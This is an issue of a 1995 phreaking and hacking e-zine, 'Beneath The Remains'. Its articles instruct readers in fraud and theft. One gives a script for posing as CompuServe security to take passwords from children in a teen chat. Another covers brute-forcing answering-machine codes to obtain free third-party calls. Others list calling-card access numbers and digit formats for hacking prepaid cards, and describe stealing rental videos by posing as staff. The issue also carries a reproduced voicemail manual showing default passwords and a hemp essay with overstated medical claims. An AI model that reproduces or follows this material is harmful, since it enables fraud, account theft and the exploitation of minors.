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- Magazine
- This phile dated 01/16/1995
- Martin Luther King, JR's Birthday
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- Will There Be Another Big Bell Crash Today?
- Volume 7
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- │ You can always find BTR on PsychoTron BBS OR AWoL (518) 383-1369 │
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- File : BTR-07.DOC
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- Crew Of Editors:
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- Substance - Head Honcho -=- Master Programmer -=- substance@globalone.net
- Roak Kill (RK) - Founder & Shit
- Treason - The Demon Knight -=- Head Of Format -=- treason@globalone.net
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- Editors VMBs : (These will be updated as they go down)
-
- Substance - [800] 775-0728 No Extension, Direct VMB
- Treason - [800] 775-0712 Extension : 1688
- BTR Box - [800] 775-0712 Extension : xxxx
- Road Kill - None That We Know Of
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- Disclaimer: BTR, it's Editors and writers take no responsibility for the
- information you learn from this mag. So blame it on someone else
- if you get in trouble!
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- BTR HQ Sites : WHQ - Another Way of Life [AWoL] 518-383-1359
- HQ - PsychoTron BBS Systems [PBS] 919-PRI-VATE
- FTP - ftp.winternet.com [/users/craigb/btr]
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- Add : Need A VMB? Well we here at BTR would be more than happy to setup just
- about anyone a 800 VMB free of charge. Although we wood except
- something or somethings in return. Not calling cards but access to
- private boards, PBXs, internet account, you know small things like that.
- But we don't guarantee your VMB will last that long. We have given some
- that have lasten 12 months, some 1 week. It's like New York lottery,
- "Hey, You never know."
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- Writers : │ Substance │ Treason │ Road Kill │
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- Writers : ┌────────────────────────────────────────────┐
- │ Stomp Box │ Spoonman │ Pliny The Elder │
- │ Ghostrider│ Anarchist │ Lizard Rock │
- │ Morpheus │ Phive │ Twisted Image │
- │ Labotomy │ Firebug │ Viper │
- │ Ser │ Ice-9 │ Malvolent Trickster│
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- Beneath The Remains :
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- - Table of Contents -
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- ARTiCLE 1 of 14 [*] The All New BTR Magazine, Editors Note - Substance
- ARTiCLE 2 of 14 [*] Hacking Compu$erve - Road Kill
- ARTiCLE 3 of 14 [*] Why The Hell Should Hemp Be Legalized? - Pliny The Elder
- ARTiCLE 4 of 14 [*] Hacking Various Answering Machines - Substance
- ARTiCLE 5 of 14 [*] Prepaid Calling Cards - Treason
- ARTiCLE 6 of 14 [*] Renting Movies & Video Games For Free - Treason
- ARTiCLE 7 of 14 [*] An Introduction To Delrina Fax Mail - Treason
- ARTiCLE 8 of 14 [*] The Guide To The IVX500 VMB System - Treason
- ARTiCLE 9 of 14 [*] My Allnet Discovery - Treason
- ARTiCLE 10 of 14 [*] System 75 Defaults - Ser
- ARTiCLE 11 of 14 [*] A Simple MCi Code Hacker In Qbasic4.5 - Substance
- ARTiCLE 12 of 14 [*] Some 518-489 Scans - Substance
- ARTiCLE 13 of 14 [*] BTR Shorts - The Whole World
- ARTiCLE 14 of 14 [*] BTR News & Shit Like That - Crew Of Editors
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- │The All New Beneath The Remains Magazine / Editors Note│
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- by The Crew Of Editors
-
- Happy fucking new year. And welcome to the new and improved issue of Beneath
- The Remains online zine. BTR, a local 518 magazine, which is always here to
- provide readers with illicit info, ranging from Pyroteknix, Phone Phreaks,
- and Hacking to Frauds and ways to get cool stuff for free. We the editors at
- BTR are here to help you do cool stuff, and it is hard to keep up with the
- times and keep the articles flowing. So please send in ANY articles to AWoL
- [518-383-1369] pretty much anything you send in will be printed, ranging from
- frauds to how to get laid on the first date. Hope you enjoy the mag. And if
- you are going to distribute this mag and add your bbs file or group app or
- some shit like that don't make it too big and if theres that shit already in
- your issue of BTR please feel free to delete it. We don't want this mag too
- big to dload so don't add to much. Here are some perks if you want to become
- a writer: Access to special writers-only teleconferences, access to special
- sections on AWoL BBS, you get to see your name in this magazine, and much
- much more. If you want to become a executive writer you get all of the above
- plus your own personal VMB. To become an exec writer you have to write a lot
- of shit and help out a load.
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- Road Kill
-
- This one beats all the other pussy texts on hacking compusrv.. Those other
- ones are soo lame, with like 50 extra bbs ad's, to make it about 1 meg, when
- the text file is only about 10k... Well fuck that, do this, I can garuntee
- that you'll get some GREAT accounts.
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-
- This method will stretch out your Social Engeneering Capabilities. (Basically
- bullshit lamers into their passwords) 1st get a fake trial account there..
- Just take a form out of a new modem box and get the free compuserv for a
- month deal, form.... Oh yea, to use those you'll need weird shit like a
- bank routing #, transit #, check #, bank name/#..... Also the other basics
- like
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- 1.> Real fake name
- 2.> Real fake address
- 3.> Real fake city/st/zip
- 4.> Real fake phone #/data #
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- Call up compusrv and once your all logged on type 'go cb' when you get logged
- into the CB simul8r. When your on the CB goto the general band, then I belive
- it is channel 17 (Teen Dorks). On there, when it asks for your handle, you
- will want to say a handle then [HELPER]. Use MIRROREYES, some dork i've
- scammed about 1 million accounts with. (yeah he is a real guy). So it would
- be MIRROREYES[HELPER] all in caps like so. Once on the teen channel, well
- you know how they are always saying shit like 16/f and 10/m... Well find
- some gullable 14/f or 10/m and (lets say there channel is #10) the conversation
- would go something like this:
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- You : Hello, this is Joe Crawford, from Compuserve Security Department, wing
- 19, we are sorry to inform you, but there are security breaches on
- your account
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- Dork : Oh really? Like what
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- You : Well have you been using your account extensively for many hours at
- a time, for the last 3 weeks?
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- Dork : No... Ive been away
-
- You : Ok, well, we can set you up with a new ID and Password, but first We
- need to verify some information from you
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- Dork : Shoot
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- You : Name, Address, City, State, Phone, ID (even tho its in front of you), PW
-
- Dork : Felix Johnson, xxx, xxx, xxx- 75053,1122 - PW: cleanse*butthead
-
- You : Ok, thank you Felix, that information has been verified, you will get
- a form in the mail, within the next 4-6 weeks confirming your new
- account. Until then, you have a security block on your account. NO
- one can call except from your phone #
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- Dork : Great thanx.
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- E*O*Conversation
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- You'll have that account for about 2 - 3 months before they catch on the bill
- is twice as much as it should be
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- by Pliny The Elder
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- I believe that marijuana should be legalized. It has proven
- medical uses, and has proven to be the "safest" mind altering
- substance you can put in your body. Marijuana has uses for
- commercial, medical, and individual interests.
- Marijuana is an Indian hemp plant which can grow just about
- anywhere and has been found growing in Arctic regions, the rain
- forests, and even in city dumps. It's scientific name is cannabis
- sativa which comes from the Latin word for hemp and sativa which
- means planted or sown (Leiberman 32). Marijuana was illegalized
- in 1937, for mostly political reasons (The Benefits of Cannabis
- 1).
- Hemp is a renewable natural resource that yields the raw
- materials essential for more of our necessities and convinces
- than any other crop. Hemp grown on land in the United States that
- is not currently forested or used for agriculture can meet all of
- our oil and gas fuel needs. Twelve to thirty-eight million acres
- of hemp would provide enough fuel for all of our transportation
- use. This would mean $0.60 to $1 per gallon fuel cost to the end
- user. One ton of American grown hemp can be converted to more
- than two barrels of methanol. It is estimated that marijuana can
- yield ten to thirty tons per acre. Using hemp to generate fuel
- has several advantages over current fuels. Hemp, unlike
- petroleum, is grown as a crop, so it's a renewable energy source.
- All fuel products produce carbon dioxide when burned. Some argue
- that carbon dioxide is contributing to the "greenhouse effect"
- which is gradually warming the planet. Marijuana is a fast
- growing crop which effectively converts carbon dioxide back to
- oxygen (America's Family Farms). Charcoal, pyrolitic oil, gas, or
- methanol can be produced from cannabis hemp. Burning charcoal
- does not cause acid rain (Pulp & Paper 7).
- Marijuana is one of the best cash-crops that a farmer can
- grow. It is a rugged plant which has strong roots that help to
- anchor the soil to prevent erosion. Is requires less water,
- fertilizers and pesticides than do other food and cash crops like
- corn, cotton, and tobacco. Hemp leaves drop throughout the
- growing season, helping to add to the fertile topsoil and helping
- the soil retain it's moisture. Depending on how closely together
- the seeds are sown, hemp can help protect seedlings, or block
- sunlight to eliminate weeds. Hemp is also a good crop to rotate
- with other crops, since it helps fertilize the soil, and doesn't
- require a lot of chemicals which poison the earth (America's
- Family Farms).
- Cannabis hemp is the longest, most durable, and longest
- lasting natural fiber known to exist on the Earth. Ninety percent
- of all ship sails were made from hemp fibers since the birth of
- Christ until the 1930's. Virtually all canvas paintings were
- painted on cannabis hemp linen canvas. Ninety percent of all rope
- and twine was mode from cannabis hemp until 1937 (The Benefits of
- Cannabis 1). Seventy-five to ninety percent of the world's paper
- manufactured before 1883 was mode from hemp fiber, including the
- first two drafts of the Declaration of Independence. In 1916, the
- United States Department of Agriculture predicted a papermaking
- future for portions of the hemp stalk. They stated "Hemp hurd
- stock acts similarly to soda-poplar stock, but will produce a
- somewhat harsher and stronger sheet and one of higher folding
- endurance." A three page article appeared in the February 1938
- issue of Popular Mechanics entitled "The New Billion Dollar Crop"
- which described a breakthrough in removing the fiber-bearing
- cortex from the rest of the hemp stalk. The article stated "If
- federal regulations can be drawn to protect the public without
- preventing the legitimate culture of hemp, this new crop can add
- immeasurably to American agriculture and industry." Hemp can
- produce four times the amount of paper per acre than 20 year old
- trees and will grow anywhere in the 48 contiguous states (Pulp &
- Paper 7).
- For more than 3,500 years marijuana has been one of the most
- widely used drugs in oriental medicine. From 1842 to the 1880's,
- marijuana was one of the most often used drugs in the United
- States to treat the illnesses of adults and children. Recent
- research (1966 through 1976) reconfirms marijuana to be the
- medicine of choice for glaucoma, epilepsy, muscular spasms,
- reduction of tumors, control of nausea in cancer chemotherapy,
- emphysema, migraine, depression, and anorexia nervosa. Ninety
- percent of glaucoma victims can benefit from the use of
- marijuana. Marijuana is two to three times as effective as any
- currently legal medicines for reducing ocular pressure, without
- toxic side effects associated with legal glaucoma drugs.
- Marijuana is also one of the best dilator of the bronchi and
- bronchoiles, opening them up to allow more oxygen into the blood
- Medical research indicates that light marijuana smoking would be
- the therapy of choice for mild emphysema to allow more fresh
- areas of the bronchi to open up for more oxygen transfer. All
- research into the oxygen transfer effects caused by marijuana
- indicates that chest pains, shallowness of breath, headaches,
- etc. which are symptomatic of heavy smog exposure are usually
- alleviated by light smoking of marijuana throughout the day.
- Marijuana is the best natural expectorant to empty the lungs of
- smog. It's estimated that marijuana would replace more than fifty
- percent of Valium, Librium, and Stellazine. Marijuana is
- currently the best way known to dry one's mouth for dentistry;
- and if legal would replace the highly toxic Probanthine.
- Marijuana is also the best relaxant and back spasm medicine
- available short of morphine (The Benefits of Cannabis 2-3).
- Even if the beneficial effects of marijuana are ignored for
- a minute, the question of legalization is still an easy one. No
- government, federal, state, or local has any right to tell any
- man what he can or can not do to his body. It is possible that
- the government has a responsibility to educate the public about
- substances that might be harmful to them. It might even be
- arguable that governments have a right to protect people from
- dangers that they can not perceive, such as dangers from a
- pesticide. Instead of letting the populace decide for themselves,
- the United States government is deciding for them. The government
- is saying that they don't trust John Q. Public to make up his own
- mind, and that they must remain every vigilant over him to
- protect him from every possible harm in the world. The United
- States Government apparently doesn't want a free thinking society
- where people can make up their own minds. Aspirin causes hundreds
- of deaths a year. During the entire record of human existence,
- not a single death has been caused by cannabis (Young 1).
- The benefits of legalization of cannabis sativa are nearly
- innumerable. There has not been a single death related to hemp in
- all of recorded history. What possible reason can anyone give to
- deny the citizens of the United State's right to use God's great
- gift to the fullest? Sure, the chronic smoker won't get a
- completely free ride, but they know that and it is their
- decision. Hemp must be legalized for commercial and medicinal
- purposes and the purposes of the individual. Who will deny the
- human race the great benefits that can come from this mighty
- herb?
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- Works Cited
-
- The Benefits of Cannabis. Peacenet, 1992.
- Leiberman, John S. Plants that grow Wild. New York: Prentice
- Hall, 1984.
- The Proven way to Save America's Family Farms. California:
- Business Alliance for Commerce in Hemp, N.d.
- Young, Francis L. Cannabis/Marijuana's Accepted Safety for Use
- Under Medical Supervision. New York: N.p., 1988.
- Young, Jim. "It's time to reconsider hemp." Pulp & Paper June
- 1991: 7.
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- Welcome to the wonderful world of answering machine hacking, to start
- ill first tell you a bit about what the hell the purpose of hacking
- answering machines is. Here is some purposes :
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- 1 Free Calls (3rd party)
- 2 Chicks Dig It
- 3 You can use it as a code line
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- To find an answering machine, you need the IQ of a dog (in other words
- Coventry, dont bother). Once you find it, and start hearing the message
- hit *, if that works and it brings you straight to the BEEP, then krad, yer
- set.. If not, dont bother hacking it, it wont even let you access it remotly.
- A good answering machine to hack is (518)383-1111 Jesus, i must have cracked
- that guys code 400 times, everytime he'd change it, id get it :> Now most
- answering machines are only 2 digit passwords, some 3, and a very tight
- security (which really isnt needed for an answering machine) would of course
- be 4 digits... Once you hear the beep to start recording, start with 00, dial
- like this
-
- (Oh yeah, a big button phone for blind people is suggested for this way)
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- Pattern for haking ans. machinez
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- 00 01 02 03 04 05 06 07 08 09 10
- 11 12 13 14 15 16 17 18 19 20 21
- 22 23 24 .................... 99
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- Keep listening closly to the earpeice while you dial these.. You should hear
- another beep, then the messages that were previously recored playing backwards
- After a few sex, if you hit a good one, it will have a audiomated voice, spi-
- tting out options. Like * for help, 1 to hear messages, 2 to delete messages,
- 3 to Change outgoing announcment, 4 to logout (Alltho not in those exact werds)
- Heres where the making free calls comes in... Hit the number that you hit to
- change outgoing announcment, when you hear another BEEEPPP then say EXACTLY
- this.
-
- ' Operator I except all 3rd party and Collect Calls ........ Hi this is
- <name> at <the # of the hacked house> please leave a message '
-
- Then it will save (usually, unless told otherwise, Earlier)... The very great
- thing about this shit is, that if you call the operator and say 'Id like to
- make a 3rd party call to (npa)xxx-yyyy, my name is Rick' They will call and
- say 'The party verified, thank you for abusing AT&T <click> ' Whala Yer
- connected 4 free.. Even tho there bill will say
-
- '3rd party bill from (yer)num-ber to (cal)led-party' You CANNOT and i repeat
- CANNOT get introuble, say you didnt do it, AND even if they prove it, THEY
- ACCEPTED, what the fuck can they do!?!?!?!?
-
- You can use it as a code line, if its 8oo, which are kinda hard to comeby,
- but still cool
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- Enuf with this....
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- Lately in the past few months or so I have noticed a rather large
- ammount of Prepaid Calling Cards being distributed. A Prepaid Calling Card
- is A Calling Card that all you do is pay for it and it has a special ammount
- of time slotted. I thought this would be a particularly useful topic to write
- about since it can aid all phreaks and hackers. Lets say I went to Joe Store
- and gave them $15. In return I would most likely recieve a 10 or 15 minute
- call card. In this article I am going to focus on mainly a few that I happen
- to know some about. I have only seen PCCs in intervuls of 7, 10, 25, 30, and
- 90 minute cards. And all of these cards have 1 thing in common. An annoying
- as hell bitchy voice comes on when theres one minutes left on your PCC and
- tells you that. That fucks up any modem connection if any. Plus all of these
- service are open 24/7.
-
- Theres a new company called Talk 'N Toss. They are offering 30 minute
- and 90 minute call cards to resalers. So if you wish to place an order to
- sell them at your business dial their customer service toll-phree hotline.
- (800) 631-8895. Plus i'm sure you can SE the lady into getting free cards.
- I've done it once so it can be done. This call doesn't appear on your phone
- bill. They say it saves 38% from a normal AT&T Call Card.
-
- I have seen these selling only two places. The first is a grocery
- store in Colorado called Albertsons. I don't know if this grocery store is
- only in Colorado, but thats just where I have happen to run across it. The
- other is Revco drugstore formerly Brooks. They have 10 minute card for $3.99
- and a 20 minute card for $9.99(?) and a 30 minute call card goes for $9.99
- there, and a 90 minute phone card goes for a whopping $24.99. Deal or not?
- If you want to fuck with 'em call (800) 213-0304, in the form XXX-XXX-XXX.
- With the customer service # at (800) 354-2708.
-
- Marvel Comics and Kay-Bee toys have put together a deal to sell 20
- minute X-Men calling cards. They have 4 so called limited edition cards with
- some wussy's fighting on the front. On the back there is a card and a scratch
- off area to see the card number. To further expirement call (800) 616-8883.
- The cards are 9 digits long.
-
- Champs Sporting Goods Store has a new deal where if you purchase over
- $35 worth of shit you get a free 7 minute call card. 7 minutes basically
- ain't worth shit. But for some things it is. The number is (800) 437-6404.
- The cards have 9 digits in the form : XXX-XXX-XXX.
-
- Randomly inserted into Classic 4-Sport, sports cards are Sprint
- 100,000 Prepaid FoNCARDS. Now what the fuck would some baseball card do with
- a Prepaid FoNCARD? I still haven't figured it out. But Sprint has some deal
- with Classic Games Inc. The odds of finding a Sprint FoNCARD is 1:72. I don't
- know for how many minutes they are for or how many digits they are. But If
- I find anything I'll keep you posted.
-
- Again Classic is trying to offer something to the collector again. But
- this time it's about real money. Not opening a $1.50 pack of cards. They're
- now offering 1, 5, 10, 20 and 1000 dollar cards to dealers. These are such hot
- commodities that the prices double every quarter! So I asked some ripoff
- artist what the deal was on getting it he said for a $1000 card you must pay
- a $750 downpayment with a max order of 1. But the rest you have to order 18
- cases of the rest to order them wholesale. That's 108 cards a case. But I'm
- sure you can find them singular. Try looking in your local sports page for
- adds for Sportscards conventions.
-
- Attention sports fans once again. GTE is offering 25 minute call cards
- that look like actual calling cards. But these cards you can order with any
- proffesional football team helmet logo on the front of it. They call these
- "NFL Collectibles". But the minimum order is 2 cards. Plus then they send you
- a 5 minute bonus card that features helmets from all 30 NFL teams. To order
- each card is only $14.75 but you have to get 2. Call 1-800-GTE-3804 in the
- US. And outside the US call (303) 743-4138, extension 712. Or just fax
- (303)-727-4994. You must order these with a credit card. I saw this add in
- Sports Illustrated.
-
- Hallmark is also working with Sprint to rip you off for the Christmas
- season. They have 10 minute call cards which are poly-wrapped inside greeting
- cards. Now for the Christmas season they have tighter wrapped Christmas Call
- Cards. These sell for $5.95 at you local Hallmark store. But I happen to like
- these cards the best since they're easier to ripoff. Go ahead hack some.
- (800) 504-1115, or for the same plus a Happy Holidays greeting call
- (800) 203-1225. Either way it works. They are 10 digits in the form :
- XXX-XXX-XXXX. Their customer service/questions toll-phree hotline is
- (800) 516-2121. You can only call US plus US territories.
-
- Pepsi Cola company is the stupidest asses for printing the phone #
- for their calling card system on the back of any 12 pack box. Pepsi offers
- the shitiest cards but spent the most on advertising. They have a 5 minute
- calling card randomly inserted into Pepsi Holiday 12 packs. So just call up
- s(800) 929-COLA or (800) 929-3652 (same) and it says "Enter Your 14 Digit
- Code". It's just asking to be ripped off. But if you think a Hallmark 10
- minute card isn't worth it then fuck this idea.
-
- 7-11 the slurpee guys are now working with AT&T to bring you their
- 7-11 Phone Cards. It's supposed to save 50% or more. Now I know this is a big
- crock of shit. On the brochure it shows a data table comparing a 3 minute call
- from LA to NY. It says a 7-11 Phone Card is $1.00, Collect Call is $3, a
- Payphone is $2.70, and a Call Card is $1.70. I know when I call LD it's only
- like 15 or close to the cents a minute, not this ripoff. They are available
- in 15, 30 or 60 minute cards. I found a nice sales pitch on the brochure. It
- says "After your time is used up, the card becomes inactive and you just buy
- a new card!", yeah right. With this card unlike the Hallmarks you can call
- international. But this call must originate from within the US. But since
- international rates vary a 15 minute card could only be 5 minutes. They don't
- actually give you that ammount of time. It depends where you call. It's just
- setup so you have a certain ammount of money credit and once that's used fuck
- how many minutes are left your time is up. Remember when you want a 7-11 card
- it is always best to ask for Habib.
-
- Here is a list of those #'s and how many digits your supposed to use.
-
- Talk n Toss Customer Service (800) 631-8895
- Talk n Toss/Revco Cards (800) 213-0304 - 10 Digits
- Talk n Toss/Revco/CS (800) 354-2708
- X-Men/Kay Bee Toys (800) 616-8883 - 9 Digits
- Champs Sporting Goods (800) 437-6404 - 10 Digits
- Pepsi (800) 929-CoLA - 14 Digits
- Hallmark/Sprint (800) 504-1115 - 10 Digits
- Hallmark/Sprint/Holidays (800) 203-1225 - 10 Digits
- Ordering GTE Football Cards (800) GTE-3804
- Ordering GTE In 303 NPA (303) 743-4138
- Ordering GTE In 303 NPA Fax (303) 727-4994
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- │Renting Movies & Video Games For Free│
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- treason@globalone.net
- Question:
-
- So you want to be able to go to just about anyvideo store or grocery store
- and get some free movies and video games that are NEVER due back?
-
- Answer:
- Hell Yeah, read on.
-
- There are 2 ways to pull this one off. At places where you either :
-
- <.1.> Return Videos To Countertop
- <.2.> Return Videos Through Dropslot
- <.3.> Stand Outside While Pretending To Work There
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- <.1.> Return Videos To Countertop
-
- First find a place where you can rent movies or games. Video stores are the
- first and easiest targets. Grocery stores are up there to. You want to find
- a video store where when after a person rents a movie they have to set it
- on a countertop and a person who works there will pick it up and put it back
- when he/she has time. Most people who work at video stores are either bored
- to death or overwelmed with work. You don't want to be in a place where the
- clerk is watching Benji Comes Home 24/7. You want a nice quick busy paced
- atmosphere. Now the good part.
-
- When a person finished their movie/game and set it on the counter the person
- has go to the area to put it back. But it theres people trying to take out
- movies at the same time they do it once the active customer is finished.
- That's where you come in. Hang around a video store for a while so you get
- used to the atmosphere in a way. Find a good area to pretend to be looking
- at movies but where you can see the cashier and renter. Pick a good time.
- From 7PM to closing is usually one of the best. Once you have atleast a 2
- person line and a pile of videos starting to build that's where you mosey
- on over. You don't have to be stealth just act like your looking at the
- videos recently dropped in. If anything looks semi-interesting just slowly
- move your hands with the video in them down to under the counter where the
- dude behind it can't see the flick you have in your hands. Now you won't get
- caught, turn around and walk to some other section of the store. Place the
- article of viewing anywhere in your clothing you want to. Then just get out.
- I have found this work mostly. The key thing is all in the right timing. Once
- you get the goods you can watch them, sell them or burn them.
-
- <.2.> Return Videos Through A Dropslot
-
- Now this method is still easy but it takes a little more brains. There are 2
- kinds of dropslots. The first is a downward slot through somewhere in a
- counter or table where the stuff drops into a box or something. Where the
- second is a little door you open then drop the videos in, plus you have to be
- able to see the pile of videos on the bottom.
-
- In the first dropslot situation you can find something like a little piece of
- wood or metal you can slip in to stop videos from going all the way to the
- bottom. Then once they have put their shit on in you can just reach in and
- take 'em. Another idea is take a hanger and unfold it so it's straight and
- position one side so it sort of locks around one edge and wedge it down so
- it'll stop the flow of videos, then hook the other side to the other edge.
- So that will catch them also.
-
- Here is a diagram demostrating how you can fit something in to stop the flow
- of videos. The rectangle in the middle is the dropslot, and the thing between
- it is the hangar. I have it at a slant to you can better picture it.
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- <.3.> Stand Outside While Pretending To Work There
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- Get a fairly large cardboard box and write video drop on it in marker. If
- this store your going to victimize has nametags, then make one with an alias
- on it for you, or steal one. This betterly works at videostores, not really
- other places. I don't recomend trying this in cold weather.
-
- Stand outside and as customers walk to the door tell them that your doing a
- complementary service and collecting videos outside so they don't have to go
- inside. If they say they're going inside anyways it's best to shut your
- mouth, because you don't want people complaining about a fake employee. With
- this method collect as much as you want until you hear sirens.
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- │An Introduction To Delrina Fax Mail│
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- by ──┼──reason│ {518}
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- Delrina Fax MailBox Add:
-
- No matter where you are, where your're headed, or what time it is, you can
- now be certain you'll get every fax people send you ─- even if they don't
- know where to find you. With new Delrina Fax MailBox service, it's easy. In
- fact, we're so sure you'll agree, we're going to give you one month of
- service and 10 fax pages free. Now, confidential and reliable fax storage is
- just two easy sets away.
-
- Step One: Someone needs to send you a fax, so they dial your toll-free 800
- number (which we give you) and it goes. Then Fax MailBox recevies and stores
- it for you electronically until your ready to retrieve it.
-
- Step two: You use your PC or laptop with a fax modem and Delrina WinFax PRO
- 4.0 software, and retrieve your fax with a simple click of the mouse. Or use
- a fax machine, enter your password, and print it on the spot. It's that easy.
- Just think of Fax MailBox as voice mail, but for faxes.
-
- Call today and sign up for Delrina Fax MailBox and you'll start getting all
- your faxes ── for a change.
-
- Delrina FaxMailbox 1-800-238-8980
-
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-
- Basically what this system is a VMB but for faxes. So it's a FMB.
- What you can do with this is have someone send your FMB a fax and you can
- call enter you password and retrieve it. It can be good for hackers so you
- can have the back and forth exchange of elite information.
- You can call that number for the a month free. If you register it to
- an alias and tell them not to call you or give them a number that's always
- busy. Remember this your service is only cut off when you cancel it. So your
- service can keep on going and going and going with bills being sent to your
- alias.
- Once I ran across a Delrina Fax MailBox number by accident, here it
- is. 1-800-368-9414 and then the next few numbers are assigned to it. You can
- try to hack the password. (That whole 1-800-369-94xx is loaded with these)
- Each member gets their own 800 number an operator told me.
- I basically know a little but this is good enough for someone to
- start out on.
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- │ IVX500 Voice Mail Users Guide │
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- by
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- ──┼──reason│ [518]
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- treason@globalone.net
-
- This is an IVX500 Voice Mail Users Guide. I know someone that recently
- purchased this system for his office and I got a handy manual. So I
- read it over and decided certain things just needed to be known. But
- when I told most people that I was typing this up they thought it would
- be close to a 6,000 page document, like a Meridian Mail. But this system
- is just as efficent and you will find all of the command listed below.
-
- Index
- <.1.> Introduction To IVX500 Voice Mail
- <.2.> Entering And Initialinzing Your Mailbox
- <.3.> Listening To And Sending Messages
- <.4.> Personal Options
- <.5.> Remote Messaging And Using The Directory
- <.6.> Where Can I Find This System?
-
-
- <.1.> Introduction To IVX500 Voice Mail
-
- The IVX500 System has a Voice Mail feature that allows callers to send and
- recieve recorded messages from any station or touchtone telephone. (Callers
- using dial-pulse phones can be routed to the operator for assistance)
-
- Stations users and outside callers reach Voice Mail in the following ways:
-
- ■ By dialing the telephone number or extension number assigned to the Voice
- Mail application.
-
- ■ By being transferred to Voice Mail by the automated attendant.
-
- ■ By being forwarded (using manual or system forward) to Voice Mail when a
- called station is unavailable.
-
- ■ By responding to message waiting indications left by Voice Mail at a
- station. (Not available with some telephone systems and station instruments)
-
- When you reach Voice Mail, you wil hear recorded instructions that tell you
- what to do next. Simply listen to the prompts and press the keypad key that
- corresponds to the desired choice. If you do not respond immediately, a second
- set of prompts is played.
-
- Most prompts are interruptible, and you can press the desired key at any time
- during the prompt. The prompt will then stop and the system will act on the
- requested choice.
-
- Each Voice Mail user can be assigned a unique Voice Mailbox number. There are
- three types of mailboxes: Standard, Receive-Only, and System Administrator.
-
- ■ Standard mailbox features include: listening to new messages, sending
- messages, forwarding messages, deleting messages, saving messages,
- programming personal options, and if authorized through database programming
- setting up remote messaging.
-
- ■ A Receive-Only mamilbox user can only listen to new messages, save or delete
- them, and program personal options.
-
- ■ The System Administrator has all of the Standard mailbox options, plus the
- ability to record and send broadcast messages, provide mailbox and group
- list maintenance, and record and select custom recordings.
-
- With most telephone systems, your station is signaled when your mailbox gets
- a message. If you have a keyset the MSG key lights and the display shows that
- a message ha been received. If you have a single-line set, the MSG key lights
- and you hear message waiting signals(ie 6 tones) when the handset is lifted.
-
- NOTE: Message waiting indications (lights, displays and signals) may not be
- available on certain telephone systems and station instruments.
-
- If your station has more than one associated mailbox, the message indications
- will continue until all messages from all associated mailboxes have been
- heard. However, the display does not show which mailbox has recieved the msgs.
-
- Remote Messaging can be enabled or your mailbox through database programming
- and set up through your mailbox. It allows you to enter the primary and set
- up through your mailbox. It allows you to enter the primary and/or alternate
- telephone number or extension number that the system will call when new
- messages are recieved by your mailbox.
-
-
- <.2.> Entering And Initializing Your Mailbox
-
- When you enter your mailbox, the system mayi play one of the following msgs.
-
- ■ MAILBOX ALMOST FULL OR FULL: If your mailbox is full, no new messages can
- be recieved unitl you delete waiting or saved messages.
-
- ■ MESSAGE COUNT: The system tells you how many messages are waiting to be
- heard, if any and how many are priority messages.
-
- ■ REMOTE MESSAGING: The system will indicate whether primary or alternate
- remote messaging is selected when remote messaging is enabled. It will also
- alert you if a programming error has been detected and/or whether it
- encountered busy sytem resources when attempting to place a remote messaging
- call.
-
- ENTER YOUR MAILBOX BY THE FOLLOWING STEPS:
-
- ── Dial the Voice Mail access number. (You hear the Main Menu)
- ── During or after the greeting, press * to identify yourself as a subscriber.
- ── Enter yourmailbox number and yoru personal password (if programmed). Then
- press #.
-
- IF YOUR MSG KEY IS LIT AND YOU HAVE A MESSAGE FROM VOICE MAIL:
-
- ── Press MSG
- ── If required, enter your mailbox number.
- ── Enter your personal password and press #.
-
- The first time you use your mailbox, you must initialize it (set it up).
- System prompts will instruct you to:
-
- ■ Change the default password number to a personal password.
- ■ Record a name to identify yourself in the company directory.
- ■ Listen to the Voice Mail application introduction. (You can't skip this
- introduction. If you exti without listening to it, the introduction will
- play again the next time you enter your mailbox.
-
- TO INITIALIZE YOUR MAILBOX:
-
- ── Dial the Voice Mail access number. (You hear the Main Menu)
- ── Pree * to identify yourself as a subscriber or hacker.
- ── Enter your mailbox number and default password. (Your default password is
- the mailbox number.)
- ── IF YOU WANT A PASSWORD, enter a new password using digits 0-9, up to 12
- digits though. Then press #. Voice Mail plays back your password.
- If you don't want a password press #.
- ── Press # to accept the entry. (Or press 3 if you wish to reenter the pword)
- The system prompts you to record your directory name.
- ── After the tone, record your first and last name. When finished press #.
- ── Press # again to accept the name. (Or bang 1 to replay the name you just
- recorded without saving, or 2 to add to your name, or press 3 to erase and
- then rerecord it.
- ── The sytem then plays a prompt that introduces you to basic Voice Mail
- functions. (You can't skip this tutorial. If you exit without listening to
- it, the introduction will play again the next time your enter your mailbox)
-
-
- <.3.> Listening To And Sending Messages
-
- Whenever you enter your mailbox, you are told how many new and saved messages
- you have.
-
- TO LISTEN TO MESSAGES:
-
- ── Enter your mailbox as described on Section 2
- ── EITHER, Press 1 to listen to your new messages.
- OR, Press 3 to listen to your saved messages.
- ── The system plays each message in the queue selected. While you are
- listening to a message, you can use the following options:
-
- ■ Press 1 to back up
- ■ Press 2 to pause. (Then press any key to continue.)
- ■ Press 3 to skip ahead.
- ■ Press 4 to lower the volume.
- ■ Press 5 to play the message envelope again.
- ■ Press 6 to raise the volume.
- ■ Press # to skip to the end of the recording.
-
- ── When the message has finished playing, you have the following choices:
-
- ■ Press 1 to replay the message from the beginning.
- ■ Press 2 to reply to the message.
- ■ Press 3 to forward a copy of the message to another subscriber, along
- with your introductory comments.
- ■ Press 4 to listen to the previous message.
- ■ Press 5 to play the introductory message "envelope" again.
- ■ Press 6 to the next message.
- ■ Press 7 to save the new message in your mailbox.
- ■ Press 9 to delete the message from your mailbox.
-
- TO SEND MESSAGES:
-
- ── Enter your mailbox as described in section 2.
- ── Press 2.
- ── Dial the desired mailbox number or group list number.
- ── After hearing the subscriber's name, press # to accept it.
- ── When you hear the tone record your message.
- ■ To pause while recording press 2. To continue press any key.
- ■ To erase and re-record your message press 3.
-
- ── EITHER, Hang up to send the message.
- OR, Use one of the following options:
- ■ Press 1 to replay the message.
- ■ Press 2 to add to the message.
- ■ Press 3 to erase and re-record the message.
-
- ── EITHER, Press # to send the message.
- OR, Press 1 to use the special delivery options. You can perform one or
- more of the following steps:
- ■ Press 1 to mark the message "private" to prevent the recipient from
- forwarding it.
- ■ Press 2 to mark the message "certified" if you want to recieve a receipt
- notice.
- ■ Press 3 to mark the message "priority" to place your message ahead of
- all other waiting messages in the recieving mailbox.
- ■ Press * to cancel delievery options.
- ■ Press # to deliver the message.
-
- ── After the message has been sent, you may hang up or choose either of the
- following options:
- ■ Press 1 and enter another mailbox number to send the message to another
- destination.
- ■ Press # to return to the Main Menu.
-
- <.4.> Personal Options
-
- Personal Options allow you to customize your mailbox. Voice Mail has the
- following personal options:
-
